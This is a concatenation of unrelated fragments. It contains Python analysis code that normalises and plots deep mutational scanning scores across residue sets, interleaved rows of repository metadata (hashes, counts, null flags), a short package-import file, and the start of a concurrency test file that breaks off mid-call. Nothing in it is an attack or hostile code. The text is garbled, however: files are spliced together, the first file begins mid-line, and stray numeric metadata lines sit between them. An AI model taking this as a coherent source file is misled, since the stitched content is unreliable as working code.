str(x)][folder])[0]\ +str(x) + suffix, index_col = [0]) flat_list = [item for sublist in fchange.values for item in sublist] fig.add_trace(go.Histogram(x=flat_list, xbins=dict(# bins for histogram start=min(flat_list), end=max(flat_list), size=0.25 ),), row=pos[0], col=pos[1]) # new replicates single residues elif x in res_redo: start = list(samples[samples['Set'] == str(x)]['Start range'])[0] end = list(samples[samples['Set'] == str(x)]['End range'])[0] sites = list(samples[samples['Set'] == str(x)]['Sites'])[0] sites = ['Res '+ str(x) for x in sites.split(',')] fchange = pd.read_csv(list(samples[samples['Set']==\ str(x)][folder])[0]\ +str(x) +suffix, index_col = [0]) fchange.columns = ['Res '+str(x) for x in list(range(start, end))] fchange = fchange[sites] flat_list = [item for sublist in fchange.values for item in sublist] fig.add_trace(go.Histogram(x=flat_list, xbins=dict( # bins for histogram start=min(flat_list), end=max(flat_list), size=0.25 ),), row=pos[0], col=pos[1]) fig.update_layout(height=700, width=900, title_text=kwarg['title']) fig.show() if save == True: plotly.offline.plot(fig, filename = kwarg['name']) def transform_sigma(folder, suffix, samples, sets, res_redo, all_sets): ''' Takes the folder and the suffix of the files and computes the standard deviations--scaling factors--for all sets. ____________ Input: folder--name of category in the sample spreadsheet that points to folder where data are stored suffix--suffix of the file name Output: list in which each element is paired. First item in pair is the set, second is the numerical value for the standard deviation --scaling factor--of the set. ''' sigma_list = [] for x in all_sets: fchange = pd.read_csv(list(samples[samples['Set']==str(x)][folder])[0]\ + str(x) + suffix, index_col = [0]) start = list(samples[samples['Set'] == str(x)]['Start range'])[0] end = list(samples[samples['Set'] == str(x)]['End range'])[0] fchange.columns = ['Res '+str(x) for x in list(range(start, end))] # name the columns wt_subseq = wt_full[start:end] #find WT residues for the set flat_list = np.array([item for sublist in fchange.values for item \ in sublist]) mean = flat_list[~np.isnan(flat_list)].mean() # mean of the set var = flat_list[~np.isnan(flat_list)].var() # variance of the set # set the variance of all set to 1 var_norm = (flat_list-mean)/np.sqrt(var)+mean sigma_list.append([x, np.sqrt(var)]) return(sigma_list) def transform_dist( folder, suffix, samples, sets, res_redo, all_sets, set21, save = False, **kwarg): ''' Distribution shape of original scores from screen. ___________________ Input: folder: column name in sample spreadsheet that points to folder suffix: suffix of the file name if save = True add kwarg name: file path for saving figure ''' # average value of wt # average value of stop codon # number of residues in set mean_stop = {} len_set = {} fig = make_subplots( rows=5, cols=6) layout= itertools.product(range(1,6), range(1,7)) for x, pos in list(zip(sets + res_redo + set21, layout)): if x in sets: fchange = pd.read_csv(list(samples[samples['Set']==\ str(x)][folder])[0]\ + str(x) + suffix, index_col = [0]) start = list(samples[samples['Set'] == str(x)]['Start range'])[0] end = list(samples[samples['Set'] == str(x)]['End range'])[0] fchange.columns = ['Res '+str(x) for x in list(range(start, end))] # name the columns wt_subseq = wt_full[start:end] #find WT residues for the set fchange.columns = ['Res '+str(x) for x in list(range(start, end))] #set average wt to 0 cols = fchange.columns wt_vals = [] for row, col in zip(wt_subseq, cols): wt_vals.append(fchange.loc[row, col]) wt_mean = np.mean(wt_vals) fchange = fchange - wt_mean # add to dict for mean stop mean_stop[str(x)] = np.mean(fchange.loc['*']) len_set[str(x)] = len(fchange.columns) stop_mean = np.mean(fchange.loc['*']) scale_factor = -1/stop_mean fchange_norm = (fchange - wt_mean)*scale_factor flatten_fchange = fchange_norm.values flat_list = np.array([item for sublist in flatten_fchange for\ item in sublist]) fig.add_trace(go.Histogram(x=flat_list, xbins=dict( # bins for histogram start=min(flat_list), end=max(flat_list), size=0.25 ),), row=pos[0], col=pos[1]) elif x in set21: fchange = pd.read_csv(list(samples[samples['Set']==\ str(x)][folder])[0]\ + str(x) + suffix, index_col = [0]) start = list(samples[samples['Set'] == str(x)]['Start range'])[0] end = list(samples[samples['Set'] == str(x)]['End range'])[0] fchange.columns = ['Res '+str(x) for x in list(range(start, end))] # name the columns wt_subseq = wt_full[start:end] #find WT residues for the set fchange.columns = ['Res '+str(x) for x in list(range(start, end))] #set average wt to 0 cols = fchange.columns[:2] wt_vals = [] for row, col in zip(wt_subseq, cols): wt_vals.append(fchange.loc[row, col]) wt_mean = np.mean(wt_vals) fchange = fchange - wt_mean # add to dict for mean stop mean_stop[str(x)] = np.mean(fchange.loc['*'][:2]) len_set[str(x)] = 2 stop_mean = np.mean(fchange.loc['*'][:2]) scale_factor = -1/stop_mean fchange_norm = (fchange - wt_mean)*scale_factor flatten_fchange = fchange_norm.values flat_list = np.array([item for sublist in flatten_fchange for\ item in sublist]) fig.add_trace(go.Histogram(x=flat_list, xbins=dict( # bins for histogram start=min(flat_list), end=max(flat_list), size=0.25 ),), row=pos[0], col=pos[1]) else: # for all individually repeated residues set_ind = x.find('R') #identify the R notation for the repeated set set_redo = x[:set_ind] start = list(samples[samples['Set'] == str(x)]['Start range'])[0] end = list(samples[samples['Set'] == str(x)]['End range'])[0] sites_ = list(samples[samples['Set'] == str(x)]['Sites'])[0] sites = ['Res '+ str(x) for x in sites_.split(',')] fchange = pd.read_csv(list(samples[samples['Set']==\ str(x)][folder])[0]\ + str(x) + suffix, index_col = [0]) fchange.columns = ['Res '+str(x) for x in list(range(start, end))] fchange = fchange[sites] #find WT residues for the set wt_subseq = [wt_full[int(ind)] for ind in sites_.split(',')] cols = fchange.columns wt_vals = [] for row, col in zip(wt_subseq, cols): wt_vals.append(fchange.loc[row, col]) # Calculate scaling values for slotting in individual residues wt_mean = np.mean(wt_vals) fchange = fchange-wt_mean stop_mean = np.mean(fchange.loc['*']) scale_factor = mean_stop[set_redo]/stop_mean fchange_norm = fchange*scale_factor # print(x, np.mean(wt_vals), np.var(wt_vals)) flatten_fchange = fchange_norm.values flat_list = np.array([item for sublist in flatten_fchange for \ item in sublist]) fig.add_trace(go.Histogram(x=flat_list, xbins=dict( # bins used for histogram start=min(flat_list), end=max(flat_list), size=0.25 ),), row=pos[0], col=pos[1]) fig.update_layout(height=700, width=900, title_text=kwarg['title']) fig.show() if save == True: plotly.offline.plot(fig, filename = kwarg['name']) def transform_dist_sigma( folder, suffix, samples, sets, res_redo, all_sets, save = False, **kwarg): ''' Distribution shape of original scores from screen. WT from each set is set to 0 and variance of each set is set to 1. ___________________ Input: folder: column name in sample spreadsheet that points to folder suffix: suffix of the file name samples: dataframe of sample_spreadsheet with data specs sets: complete sets res_redo: residues that were individually sequenced all_sets: all sets including those that were individually resequenced if save = True add kwarg name: file path for saving figure ''' # average value of wt # average value of stop codon # number of residues in set mean_stop = {} len_set = {} fig = make_subplots( rows=5, cols=6) layout= itertools.product(range(1,6), range(1,7)) for x, pos in list(zip(sets + res_redo, layout)): if x in sets: fchange = pd.read_csv(list(samples[samples['Set']\ ==str(x)][folder])[0]\ + str(x) + suffix, index_col = [0]) start = list(samples[samples['Set'] == str(x)]['Start range'])[0] end = list(samples[samples['Set'] == str(x)]['End range'])[0] # name the columns fchange.columns = ['Res '+str(x) for x in list(range(start, end))] wt_subseq = wt_full[start:end] #find WT residues for the set flat_list = np.array([item for sublist in fchange.values for item in sublist]) mean = flat_list[~np.isnan(flat_list)].mean() # mean of the set var = flat_list[~np.isnan(flat_list)].var() # variance of the set # set the variance of all sets to 1 fchange_norm = (fchange-mean)/np.sqrt(var) + mean fchange_norm.columns = ['Res '+str(x) for x in list(range(start, end))] # name the columns #set average wt to 0 cols = fchange_norm.columns wt_vals = [] for row, col in zip(wt_subseq, cols): wt_vals.append(fchange_norm.loc[row, col]) fchange_norm = fchange_norm - np.mean(wt_vals) # add to dict for mean stop mean_stop[str(x)] = np.mean(fchange_norm.loc['*']) len_set[str(x)] = len(fchange_norm.columns) flatten_fchange = fchange_norm.values flat_list = np.array([item for sublist in flatten_fchange for item in sublist]) fig.add_trace(go.Histogram(x=flat_list, xbins=dict( # bins used for histogram start=min(flat_list), end=max(flat_list), size=0.25 ),), row=pos[0], col=pos[1]) else: # for all individually repeated residues set_ind = x.find('R') #identify the R notation for the repeated set set_redo = x[:set_ind] start = list(samples[samples['Set'] == str(x)]['Start range'])[0] end = list(samples[samples['Set'] == str(x)]['End range'])[0] sites_ = list(samples[samples['Set'] == str(x)]['Sites'])[0] sites = ['Res '+ str(x) for x in sites_.split(',')] fchange = pd.read_csv(list(samples[samples['Set']\ ==str(x)][folder])[0]\ + str(x) + suffix, index_col = [0]) fchange.columns = ['Res '+str(x) for x in list(range(start, end))] fchange = fchange[sites] wt_subseq = [wt_full[int(ind)] for ind in sites_.split(',')] cols = fchange.columns wt_vals = [] for row, col in zip(wt_subseq, cols): wt_vals.append(fchange.loc[row, col]) # Calculate scaling values for slotting in individual residues wt_mean = np.mean(wt_vals) stop_mean = np.mean(fchange.loc['*']) scale_factor = mean_stop[set_redo]/stop_mean fchange_norm = (fchange - wt_mean)*scale_factor # print(x, np.mean(wt_vals), np.var(wt_vals)) flatten_fchange = fchange_norm.values flat_list = np.array([item for sublist in\ flatten_fchange for item in sublist]) fig.add_trace(go.Histogram(x=flat_list, xbins=dict( # bins used for histogram start=min(flat_list), end=max(flat_list), size=0.25 ),), row=pos[0], col=pos[1]) fig.update_layout(height=700, width=900, title_text=kwarg['title']) fig.show() if save == True: plotly.offline.plot(fig, filename = kwarg['name']) def transform_dist_mat(folder, suffix, samples, sets, res_redo, all_sets): ''' Distribution shape of original scores from screen. ___________________ Input: folder: column name in sample spreadsheet that points to folder suffix: suffix of the file name if save = True add kwarg name: file path for saving figure ''' # average value of wt # average value of stop codon # number of residues in set len_set = {} df_list = [] mean_stop = {} for x in sets + res_redo: if x in sets: fchange = pd.read_csv(list(samples[samples['Set']==\ str(x)][folder])[0]\ + str(x) + suffix, index_col = [0]) start = list(samples[samples['Set'] == str(x)]['Start range'])[0] end = list(samples[samples['Set'] == str(x)]['End range'])[0] fchange.columns = ['Res '+str(x) for x in list(range(start, end))] wt_subseq = wt_full[start:end] #find WT residues for the set flat_list = np.array([item for sublist in fchange.values for\ item in sublist]) mean = flat_list[~np.isnan(flat_list)].mean() # mean of the set var = flat_list[~np.isnan(flat_list)].var() # variance of the set fchange.columns = ['Res '+str(x) for x in list(range(start, end))] #set average wt to 0 cols = fchange.columns wt_vals = [] for row, col in zip(wt_subseq, cols): wt_vals.append(fchange.loc[row, col]) wt_mean = np.mean(wt_vals) fchange = fchange - wt_mean mean_stop[str(x)] = np.mean(fchange.loc['*']) # add to mean stop len_set[str(x)] = len(fchange.columns) stop_mean = np.mean(fchange.loc['*']) scale_factor = 1/stop_mean fchange_norm = (fchange - wt_mean)*scale_factor flatten_fchange = fchange_norm.values df_list.append(fchange_norm) else: # for all individually repeated residues set_ind = x.find('R') #identify the R notation for the repeated set set_redo = x[:set_ind] start = list(samples[samples['Set'] == str(x)]['Start range'])[0] end = list(samples[samples['Set'] == str(x)]['End range'])[0] sites_ = list(samples[samples['Set'] == str(x)]['Sites'])[0] sites = ['Res '+ str(x) for x in sites_.split(',')] fchange = pd.read_csv(list(samples[samples['Set']==\ str(x)][folder])[0]\ + str(x) + suffix, index_col = [0]) fchange.columns = ['Res '+str(x) for x in list(range(start, end))] fchange = fchange[sites] #find WT residues for the set wt_subseq = [wt_full[int(ind)] for ind in sites_.split(',')] cols = fchange.columns wt_vals = [] for row, col in zip(wt_subseq, cols): wt_vals.append(fchange.loc[row, col]) # Calculate scaling values for slotting in individual residues wt_mean = np.mean(wt_vals) stop_mean = np.mean(fchange.loc['*']) scale_factor = mean_stop[set_redo]/stop_mean fchange_norm = (fchange - wt_mean)*scale_factor df_list.append(fchange_norm) return df_list def transform_matrix(folder, suffix, samples, sets, res_redo, all_sets, set21): ''' Transform each set so that WT fixed at 0 and stop codon is normalized to -1 in each set. __________ Input: folder: column name in sample spreadsheet that points to folder suffix: suffix of the file name samples: sample spreadsheet sets: all complete sets res_redo: all invividually resequenced sets all_sets: all sets set21: set21--treated separately because of the C terminus ''' mean_stop = {} len_set = {} set_list = [] for file in sets: fchange = pd.read_csv(list(samples[samples['Set']==\ str(file)][folder])[0]\ +str(file) + suffix, index_col = [0]) start = list(samples[samples['Set'] == str(file)]['Start range'])[0] end = list(samples[samples['Set'] == str(file)]['End range'])[0] fchange.columns = ['Res '+str(x) for x in list(range(start, end))] wt_subseq = wt_full[start:end] #find WT residues for the set flat_list = np.array([item for sublist in fchange.values\ for item in sublist]) mean = flat_list[~np.isnan(flat_list)].mean() # mean of the set var = flat_list[~np.isnan(flat_list)].var() # variance of the set fchange.columns = ['Res '+str(x) for x in list(range(start, end))] #set average wt to 0 cols = fchange.columns wt_vals = [] for row, col in zip(wt_subseq, cols): wt_vals.append(fchange.loc[row, col]) wt_mean = np.mean(wt_vals) fchange = fchange - wt_mean mean_stop[str(file)] = np.mean(fchange.loc['*']) len_set[str(file)] = len(fchange.columns) stop_mean = np.mean(fchange.loc['*']) scale_factor = -1/stop_mean fchange_norm = fchange*scale_factor set_list.append(fchange_norm) for file in set21: fchange = pd.read_csv(list(samples[samples['Set']==\ str(file)][folder])[0]\ + str(file) + suffix, index_col = [0]) start = list(samples[samples['Set'] == str(file)]['Start range'])[0] end = list(samples[samples['Set'] == str(file)]['End range'])[0] # name the columns wt_subseq = wt_full[start:end] #find WT residues for the set fchange.columns = ['Res '+str(x) for x in list(range(start, end))] #set average wt to 0 cols = fchange.columns[:2] wt_vals = [] for row, col in zip(wt_subseq, cols): wt_vals.append(fchange.loc[row, col]) wt_mean = np.mean(wt_vals) fchange = fchange - wt_mean # add to dict for mean stop mean_stop[str(file)] = np.mean(fchange.loc['*'][:2]) len_set[str(file)] = 2 stop_mean = np.mean(fchange.loc['*'][:2]) scale_factor = -1/stop_mean fchange_norm = (fchange - wt_mean)*scale_factor set_list.append(fchange_norm) set_list_res = [] for file in res_redo: set_ind = file.find('R') #identify the R notation for the repeated set set_redo = file[:set_ind] start = list(samples[samples['Set'] == str(file)]['Start range'])[0] end = list(samples[samples['Set'] == str(file)]['End range'])[0] sites_ = list(samples[samples['Set'] == str(file)]['Sites'])[0] sites = ['Res '+ str(x) for x in sites_.split(',')] fchange = pd.read_csv(list(samples[samples['Set']==\ str(file)][folder])[0]\ + str(file) + suffix, index_col = [0]) fchange.columns = ['Res '+str(x) for x in list(range(start, end))] fchange = fchange[sites] wt_subseq = [wt_full[int(ind)] for ind in sites_.split(',')] cols = fchange.columns wt_vals = [] for row, col in zip(wt_subseq, cols): wt_vals.append(fchange.loc[row, col]) # Calculate scaling values for slotting in individual residues wt_mean = np.mean(wt_vals) fchange = fchange-wt_mean stop_mean = np.mean(fchange.loc['*']) scale_factor = -1/stop_mean fchange_norm = fchange *scale_factor set_list_res.append(fchange_norm) all_residues = pd.concat(set_list, axis = 1) all_res_redo = pd.concat(set_list_res, axis = 1) all_res_redo = all_res_redo.fillna('NaN') all_residues.update(all_res_redo) order = ['Res '+str(x) for x in range(1, 307)] all_residues = all_residues[order] all_residues = all_residues.applymap(lambda x: x if not \ isinstance(x, str) else np.nan) return(all_residues) def raw_dist(folder, samples, sets, res_redo, all_sets): ''' Returns the mean and standard error of the raw data. __________ Input: folder--folder where the datasets are stored. points to column in sample spreadsheet (string) Output: melted dataframe with residue and mutation along with raw means and standard deviations ''' fchange_list = [] redo_list = [] for x in sets + res_redo: # old replicates start = list(samples[samples['Set']==str(x)]['Start range'])[0] end = list(samples[samples['Set']==str(x)]['End range'])[0] sites = list(samples[samples['Set']==str(x)]['Sites'])[0] directory = list(samples[samples['Set']==str(x)][folder])[0] if x in sets: for y in range(start, end): fchange = pd.read_csv(directory + '/set' + str(x) + \ '_residue' + str(y) + '.csv') fchange['residue'] = [y]*len(fchange) fchange_list.append(fchange) # new replicates single residues elif x in res_redo: sites = [str(x) for x in sites.split(',')] for y in sites: fchange = pd.read_csv(directory + '/set' + str(x) + \ '_residue' + y + '.csv') fchange['residue'] = [y]*len(fchange) fchange_list.append(fchange) redo_list.append(fchange) #list of residues and amino acids along with raw mean and standard error error = pd.concat(fchange_list) mid = [x[1] for x in error['Translation']] error['middle'] = mid return(error) def transform_matrix_sigma(folder, suffix, samples, sets, res_redo, all_sets): ''' Transforms the data by set such that all the wildtypes are fixed at zero and standard deviation of each set is set to 1. __________ Input: folder: column name in sample spreadsheet that points to folder suffix: suffix of the file name samples: sample spreadsheet sets: all complete sets res_redo: all invividually resequenced sets all_sets: all sets ''' mean_stop = {} len_set = {} set_list = [] for file in sets: fchange = pd.read_csv(list(samples[samples['Set'] ==str(file)][folder])[0]\ +str(file) + suffix, index_col = [0]) start = list(samples[samples['Set'] == str(file)]['Start range'])[0] end = list(samples[samples['Set'] == str(file)]['End range'])[0] fchange.columns = ['Res '+str(x) for x in list(range(start, end))] wt_subseq = wt_full[start:end] #find WT residues for the set flat_list = np.array([item for sublist in fchange.values \ for item in sublist]) mean = flat_list[~np.isnan(flat_list)].mean() # mean of the set var = flat_list[~np.isnan(flat_list)].var() # variance of the set # set the variance of all set to 1 # normalize the set to unit variance fchange_norm = (fchange-mean)/np.sqrt(var)+mean #new label for columns fchange_norm.columns = ['Res '+str(x) for x in list(range(start, end))] #figure out average wt values for set and linear transform cols = fchange_norm.columns wt_vals = [] for row, col in zip(wt_subseq, cols): wt_vals.append(fchange_norm.loc[row, col]) fchange_norm = fchange_norm - np.mean(wt_vals) # add to dict for mean stop mean_stop[str(file)] = np.mean(fchange_norm.loc['*']) len_set[str(file)] = len(fchange_norm.columns) set_list.append(fchange_norm) set_list_res = [] for file in res_redo: set_ind = file.find('R') #identify the R notation for the repeated set set_redo = file[:set_ind] start = list(samples[samples['Set'] == str(file)]['Start range'])[0] end = list(samples[samples['Set'] == str(file)]['End range'])[0] sites_ = list(samples[samples['Set'] == str(file)]['Sites'])[0] sites = ['Res '+ str(x) for x in sites_.split(',')] fchange = pd.read_csv(list(samples[samples['Set']\ ==str(file)][folder])[0]\ + str(file) + suffix, index_col = [0]) fchange.columns = ['Res '+str(x) for x in list(range(start, end))] fchange = fchange[sites] #find WT residues for the set wt_subseq = [wt_full[int(ind)] for ind in sites_.split(',')] cols = fchange.columns wt_vals = [] for row, col in zip(wt_subseq, cols): wt_vals.append(fchange.loc[row, col]) # Calculate scaling values for slotting in individual residues wt_mean = np.mean(wt_vals) stop_mean = np.mean(fchange.loc['*']) scale_factor = mean_stop[set_redo]/(stop_mean-wt_mean) fchange_norm = (fchange - wt_mean)*scale_factor set_list_res.append(fchange_norm) all_residues = pd.concat(set_list, axis = 1) all_res_redo = pd.concat(set_list_res, axis = 1) all_res_redo = all_res_redo.fillna('NaN') all_residues.update(all_res_redo) order = ['Res '+str(x) for x in range(1, 307)] all_residues = all_residues[order] all_residues = all_residues.applymap(lambda x: x\ if not isinstance(x, str) else np.nan) return(all_residues, mean_stop) def replicate(rep, replicate_folder, cond_suffix, samples, sets, res_redo, set21): ''' Tranform the raw foldchanges fro single biological replicates. __________ rep: int denoting replicate number replicate folder: column in sample spreadsheet containing replicate info cond_suffix: file suffix for replicate files samples: sample spreadsheet sets: all complete sequencing sets res_redo: all individually resequenced all_residues set21: set 21 to be treated specially for the C terminal portion Output: dataframe with score at each amino acid at each residue ''' mean_stop = {} len_set = {} rep1_set = [] set_list_res = [] # replicate 1 for file in sets + res_redo + set21: replicate_dir = list(samples[samples['Set'] == \ str(file)][replicate_folder])[0] if file in sets: fchange = pd.read_csv(replicate_dir + str(file) + '_replicate'+str(rep)+cond_suffix, index_col = [0]) start = list(samples[samples['Set'] == str(file)]['Start range'])[0] end = list(samples[samples['Set'] == str(file)]['End range'])[0] fchange.columns = ['Res '+str(x) for x in list(range(start, end))] wt_subseq = wt_full[start:end] cols = fchange.columns wt_vals = [] for row, col in zip(wt_subseq, cols): wt_vals.append(fchange.loc[row, col]) wt_mean = np.mean(wt_vals) fchange = fchange - wt_mean mean_stop[str(file)] = np.mean(fchange.loc['*']) len_set[str(file)] = len(fchange.columns) stop_mean = np.mean(fchange.loc['*']) scale_factor = -1/stop_mean fchange_norm = fchange*scale_factor rep1_set.append(fchange_norm) elif file in set21: fchange = pd.read_csv(replicate_dir + str(file) + '_replicate'+str(rep)+cond_suffix, index_col = [0]) start = list(samples[samples['Set'] == str(file)]['Start range'])[0] end = list(samples[samples['Set'] == str(file)]['End range'])[0] fchange.columns = ['Res '+str(x) for x in list(range(start, end))] # name the columns wt_subseq = wt_full[start:end] #find WT residues for the set #set average wt to 0 cols = fchange.columns[:2] wt_vals = [] for row, col in zip(wt_subseq, cols): wt_vals.append(fchange.loc[row, col]) wt_mean = np.mean(wt_vals) fchange = fchange - wt_mean # add to dict for mean stop mean_stop[str(file)] = np.mean(fchange.loc['*'][:2]) len_set[str(file)] = 2 stop_mean = np.mean(fchange.loc['*'][:2]) scale_factor = -1/stop_mean fchange_norm = (fchange - wt_mean)*scale_factor rep1_set.append(fchange_norm) elif file in res_redo: set_ind = file.find('R') #identify the R notation for the repeated set set_redo = file[:set_ind] start = list(samples[samples['Set'] == str(file)]['Start range'])[0] end = list(samples[samples['Set'] == str(file)]['End range'])[0] sites_ = list(samples[samples['Set'] == str(file)]['Sites'])[0] sites = ['Res '+ str(x) for x in sites_.split(',')] fchange = pd.read_csv(replicate_dir + str(file) + '_replicate'\ + str(rep) + cond_suffix, index_col = [0]) fchange.columns = ['Res '+str(x) for x in list(range(start, end))] fchange = fchange[sites] wt_subseq = [wt_full[int(ind)] for ind in sites_.split(',')] cols = fchange.columns wt_vals = [] for row, col in zip(wt_subseq, cols): wt_vals.append(fchange.loc[row, col]) # Calculate scaling values for slotting in individual residues wt_mean = np.mean(wt_vals) stop_mean = np.mean(fchange.loc['*']) scale_factor = -1/stop_mean fchange_norm = fchange *scale_factor set_list_res.append(fchange_norm) all_residues = pd.concat(rep1_set, axis = 1) all_res_redo = pd.concat(set_list_res, axis = 1) all_res_redo = all_res_redo.fillna('NaN') all_residues.update(all_res_redo) order = ['Res '+ str(x) for x in range(1, 307)] all_residues = all_residues[order] all_residues = all_residues.applymap(lambda x: x if not \ isinstance(x, str) else np.nan) return(all_residues) def replicate_sigma(rep, replicate_folder, cond_suffix, samples, sets, res_redo): ''' Tranform the raw foldchanges fro single biological replicates. __________ rep: int denoting replicate number replicate folder: column in sample spreadsheet containing replicate info cond_suffix: file suffix for replicate files samples: sample spreadsheet sets: all complete sequencing sets res_redo: all individually resequenced all_residues set21: set 21 to be treated specially for the C terminal portion Output: dataframe with score at each amino acid at each residue ''' mean_stop = {} len_set = {} rep1_set = [] set_list_res = [] # replicate 1 for file in sets + res_redo: replicate_dir = list(samples[samples['Set'] ==str(file)][replicate_folder])[0] if file in sets: fchange = pd.read_csv(replicate_dir + str(file)\ + '_replicate'+str(rep)+cond_suffix, index_col = [0]) start = list(samples[samples['Set'] == str(file)]['Start range'])[0] end = list(samples[samples['Set'] == str(file)]['End range'])[0] fchange.columns = ['Res '+str(x) for x in list(range(start, end))] wt_subseq = wt_full[start:end] #find WT residues for the set flat_list = np.array([item for sublist \ in fchange.values for item in sublist]) mean = flat_list[~np.isnan(flat_list)].mean() var = flat_list[~np.isnan(flat_list)].var() # set the variance of all set to 1 var_norm = (flat_list-mean)/np.sqrt(var)+mean fchange_norm = (fchange-mean)/np.sqrt(var) + mean # add to dict for mean stop mean_stop[str(file)] = np.mean(fchange_norm.loc['*']) len_set[str(file)] = len(fchange_norm.columns) #new label for columns fchange_norm.columns = ['Res '+str(x) for x in \ list(range(start, end))] # name the columns #figure out average wt values for set and linear transform cols = fchange_norm.columns wt_vals = [] for row, col in zip(wt_subseq, cols): wt_vals.append(fchange_norm.loc[row, col]) fchange_norm = fchange_norm - np.mean(wt_vals) rep1_set.append(fchange_norm) elif file in res_redo: set_ind = file.find('R') #R denotes the repeated set set_redo = file[:set_ind] start = list(samples[samples['Set'] == str(file)]['Start range'])[0] end = list(samples[samples['Set'] == str(file)]['End range'])[0] sites_ = list(samples[samples['Set'] == str(file)]['Sites'])[0] sites = ['Res '+ str(x) for x in sites_.split(',')] fchange = pd.read_csv(replicate_dir + str(file) \ + '_replicate'+str(rep)+cond_suffix, index_col = [0]) fchange.columns = ['Res '+str(x) for x in list(range(start, end))] fchange = fchange[sites] #find WT residues for the set wt_subseq = [wt_full[int(ind)] for ind in sites_.split(',')] flat_list = np.array([item for sublist in fchange.values\ for item in sublist]) cols = fchange.columns wt_vals = [] for row, col in zip(wt_subseq, cols): wt_vals.append(fchange.loc[row, col]) # Calculate scaling values for slotting in individual residues wt_mean = np.mean(wt_vals) stop_mean = np.mean(fchange.loc['*']) scale_factor = mean_stop[set_redo]/(stop_mean-wt_mean) fchange_norm = (fchange - wt_mean)*scale_factor set_list_res.append(fchange_norm) all_residues = pd.concat(rep1_set, axis = 1) all_res_redo = pd.concat(set_list_res, axis = 1) all_res_redo = all_res_redo.fillna('NaN') all_residues.update(all_res_redo) order = ['Res '+ str(x) for x in range(1, 307)] all_residues = all_residues[order] all_residues = all_residues.applymap(lambda x: x if not \ isinstance(x, str) else np.nan) return(all_residues)
41.991031
82
0.574861
4,962
37,456
4.177348
0.057033
0.018333
0.058182
0.067879
0.902354
0.89946
0.893043
0.88957
0.877895
0.857005
0
0.009877
0.302648
37,456
891
83
42.038159
0.783691
0.172683
0
0.850891
0
0
0.042885
0.010096
0
0
0
0
0
1
0.016207
false
0
0.02269
0
0.040519
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
fb4c9cad4b626507dbbef81e6d792bf53ef84e30
183
py
Python
SegmentEditorWatershed/SegmentEditorWatershedLib/__init__.py
RMR54/SlicerSegmentEditorExtraEffects
fa238555cc1d48078a85665d1fe757cfe80a56fa
[ "BSD-3-Clause" ]
null
null
null
SegmentEditorWatershed/SegmentEditorWatershedLib/__init__.py
RMR54/SlicerSegmentEditorExtraEffects
fa238555cc1d48078a85665d1fe757cfe80a56fa
[ "BSD-3-Clause" ]
null
null
null
SegmentEditorWatershed/SegmentEditorWatershedLib/__init__.py
RMR54/SlicerSegmentEditorExtraEffects
fa238555cc1d48078a85665d1fe757cfe80a56fa
[ "BSD-3-Clause" ]
null
null
null
from SegmentEditorEffects.AbstractScriptedSegmentEditorEffect import * from SegmentEditorEffects.AbstractScriptedSegmentEditorLabelEffect import * from SegmentEditorEffect import *
36.6
75
0.896175
11
183
14.909091
0.545455
0.292683
0
0
0
0
0
0
0
0
0
0
0.076503
183
4
76
45.75
0.970414
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
0
1
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
7
fb4cf69bea5ec3a6ba9d2182b1e4e893a1f3a02e
12
py
Python
_draft/answers/x_9_3.py
ofl/kuku2
7247fb1862d917d23258ebe7a93dca5939433225
[ "MIT" ]
null
null
null
_draft/answers/x_9_3.py
ofl/kuku2
7247fb1862d917d23258ebe7a93dca5939433225
[ "MIT" ]
1
2021-11-13T08:03:04.000Z
2021-11-13T08:03:04.000Z
_draft/answers/x_9_3.py
ofl/kuku2
7247fb1862d917d23258ebe7a93dca5939433225
[ "MIT" ]
null
null
null
# x_9_3 # #
3
7
0.416667
3
12
1
1
0
0
0
0
0
0
0
0
0
0
0.25
0.333333
12
3
8
4
0.125
0.416667
0
null
0
null
0
0
null
0
0
0
null
1
null
true
0
0
null
null
null
1
1
1
null
0
0
0
0
0
0
0
0
0
0
1
0
0
1
0
1
1
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
0
0
0
0
0
8
fb56336063a8a1523f6e8c353850fcd4ef128a0c
179,364
py
Python
src/concurrency/_csdata_test.py
GStepien/CSToolkit
7a6872356f71843816a53c42b9abf5ae1ed97adf
[ "BSD-3-Clause" ]
null
null
null
src/concurrency/_csdata_test.py
GStepien/CSToolkit
7a6872356f71843816a53c42b9abf5ae1ed97adf
[ "BSD-3-Clause" ]
null
null
null
src/concurrency/_csdata_test.py
GStepien/CSToolkit
7a6872356f71843816a53c42b9abf5ae1ed97adf
[ "BSD-3-Clause" ]
null
null
null
import multiprocessing.managers as mp_mngr import time from queue import Full, Empty from typing import Optional, Callable, Final, Any, Tuple, cast, Union, overload, List import pytest from concurrency._fixtures import fix_csl, fix_manager, fix_picklable_manager,\ fix_csdata_factory, fix_exec, fix_init_csdata, \ fix_cscapacityqueue_factory, fix_init_queue, fix_cschunkcapacityqueue_factory, fix_csmseq_factory, \ fix_csmlseq_factory, fix_init_csmseqdata from concurrency import cs, csdata, execs from utils.types.casts import c_assert_not_none from utils.types.typevars import TYPE, TYPE2 from utils.functional import tools as ft import utils.types.containers as con INT_VAL: Final[int] = 333 ADD_X: Final[int] = 2 APPLY_TIMEOUT: Final[float] = 8.0 def __apply_add_x(num: int) -> Tuple[int, Tuple[str, int]]: return num + ADD_X, (__apply_add_x.__name__, num) def __apply_add_x_timeout(num: int) -> Tuple[int, Tuple[str, int]]: time.sleep(APPLY_TIMEOUT) return num + ADD_X, (__apply_add_x.__name__, num) # noinspection PyArgumentList def test_csdata(fix_csl: cs.En.CSL, fix_init_csdata: Any, fix_manager: Optional[mp_mngr.SyncManager], fix_csdata_factory: Callable[[cs.En.CSL, TYPE, Optional[mp_mngr.SyncManager]], csdata.Pr.CSData[TYPE]], fix_exec: execs.Im.Exec) -> None: cs_data: Final[csdata.Pr.CSData[Any]] = fix_csdata_factory(fix_csl, fix_init_csdata, fix_manager) execs.Ca.c_exec_multiple( csl=fix_csl, exec_=fix_exec, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), {'condition_check': ft.c_eq, 'params': ((), {'el_1': (cs_data, cs_data.c_get.__name__), 'params_1': None, 'el_2': ft.c_identity, 'params_2': ((), {'el': fix_init_csdata})}), 